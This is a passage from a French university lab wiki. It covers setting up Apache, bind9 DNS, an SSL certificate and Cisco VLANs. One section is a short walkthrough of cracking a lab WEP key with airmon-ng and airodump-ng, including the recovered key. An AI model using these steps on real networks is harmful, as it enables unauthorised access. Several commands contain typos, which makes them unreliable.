! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
    $TTL 259200&lt;br /&gt;
    @IN SOA dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
         21112019      ; Version&lt;br /&gt;
         7200    ; Refresh (2h)&lt;br /&gt;
         3600    ; Retry (1h)&lt;br /&gt;
         1209600 ; Expire (14j)&lt;br /&gt;
         7200   ); Minimum TTL (2h)&lt;br /&gt;
     @    IN NS  dns.ima2a5-rex4ever.site.    &amp;lt;= nom du dns ima2a5&lt;br /&gt;
     @    IN NS  ns6.gandi.net.               &amp;lt;= nom du dns de gandi&lt;br /&gt;
     dns  IN A   193.48.57.163                &amp;lt;= ip du dns ima2a5&lt;br /&gt;
     www  IN A   193.48.57.163                &amp;lt;= ip du site web&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
